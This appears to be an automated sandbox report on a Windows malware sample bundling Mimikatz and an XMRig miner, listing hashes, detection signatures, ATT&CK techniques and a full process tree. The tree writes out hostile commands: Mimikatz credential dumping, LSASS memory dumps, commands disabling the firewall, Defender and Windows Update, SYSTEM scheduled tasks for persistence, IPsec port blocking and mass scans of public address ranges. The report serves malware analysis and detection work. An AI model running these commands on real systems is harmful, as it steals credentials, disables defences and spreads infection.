Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
25-08-2024 13:34
General
-
Target
202408258fb543f0213ba465e4bf0d511ac6f465hacktoolsicedidmimikatz.exe
-
Size
8.7MB
-
MD5
8fb543f0213ba465e4bf0d511ac6f465
-
SHA1
c7a7fcc1535dda6129b40fd292ce97ddf0efcc69
-
SHA256
5b25876557cf2f5508a58b8e7d4fcd50326fbd82d1e7a2118913dae31071747e
-
SHA512
64b259415a5aea388fbe05470076b64bfaa3e728f2700d59b03d16bde39ba41043f49a0dcb85d4f6316a8abfd12b2741e33a1e74b7516543626adeb5562889fb
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (24884) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 11 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 36 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\qzebsiybv\bnidgq.exe"C:\Windows\TEMP\qzebsiybv\bnidgq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\202408258fb543f0213ba465e4bf0d511ac6f465hacktoolsicedidmimikatz.exe"C:\Users\Admin\AppData\Local\Temp\202408258fb543f0213ba465e4bf0d511ac6f465hacktoolsicedidmimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\znrgncrv\emzriir.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exeC:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt2⤵
-
C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exeC:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kgkufnrnc\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\kgkufnrnc\Corporate\vfshost.exeC:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 776 C:\Windows\TEMP\kgkufnrnc\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 316 C:\Windows\TEMP\kgkufnrnc\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2068 C:\Windows\TEMP\kgkufnrnc\2068.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2628 C:\Windows\TEMP\kgkufnrnc\2628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2880 C:\Windows\TEMP\kgkufnrnc\2880.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2116 C:\Windows\TEMP\kgkufnrnc\2116.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3140 C:\Windows\TEMP\kgkufnrnc\3140.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3692 C:\Windows\TEMP\kgkufnrnc\3692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3848 C:\Windows\TEMP\kgkufnrnc\3848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3908 C:\Windows\TEMP\kgkufnrnc\3908.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3992 C:\Windows\TEMP\kgkufnrnc\3992.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2776 C:\Windows\TEMP\kgkufnrnc\2776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3920 C:\Windows\TEMP\kgkufnrnc\3920.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 1940 C:\Windows\TEMP\kgkufnrnc\1940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 4428 C:\Windows\TEMP\kgkufnrnc\4428.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3060 C:\Windows\TEMP\kgkufnrnc\3060.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 1860 C:\Windows\TEMP\kgkufnrnc\1860.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2804 C:\Windows\TEMP\kgkufnrnc\2804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\kgkufnrnc\uhbggiaeb\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\kgkufnrnc\uhbggiaeb\bbqlvcqnq.exebbqlvcqnq.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\rwdxsq.exeC:\Windows\SysWOW64\rwdxsq.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\emzriir.exe1⤵
-
C:\Windows\ime\emzriir.exeC:\Windows\ime\emzriir.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\emzriir.exe1⤵
-
C:\Windows\ime\emzriir.exeC:\Windows\ime\emzriir.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
8.6MB
MD5a9d6a6f52f12b7e53f446dc395f88792
SHA13d3436d8ed26ce27f0a700f09ce5a7cb7e249c43
SHA25602e4064fe4c92a9f964f6e39b2bbd9788f77f045d0e23a0fe5811b4819899c93
SHA512c1c7ee4195055bf5c13dca99129ca0fc23dba58e55b14d6261e5f042f3b460e967e67c46c3a64a6aaa96134a75d746f6d90389f550188e50f0e012b1481801dc
-
Filesize
4.1MB
MD5b395455cc710ce79dcd0661060fe32d5
SHA1b3908051271c7b7f49c8824ac86e446581bbb26a
SHA256d6bd6fc10f1e95d2a43a8c04dc6da73ce5f614890232c4772d84b2eba18073e2
SHA5121e24b1e09843c1c74d818d06bfb6b45ac15a3e043bf48e5f9b0e6e155e6ee8ca440475b29d2fc9a55935694abcd813e2da99e6fe966d2ae99576c2e1c05bcf51
-
Filesize
4.2MB
MD5c633065d90372d6813d2904c0477ccff
SHA1465ac435fc5bd611ba4c69896c62067a56770885
SHA256cb012751ff00e57e6561d43e57f916ccb133002deb2b431a7e45b8508304a7d7
SHA5126b86a0555b8f7b0db228af4e98d44b30af6eeacc83cd6a0357bc92891de22c1dc54b97b803d7906ff3b73b71f7d97e777b30fc58d10d1f53e6cf1aa96a1ac552
-
Filesize
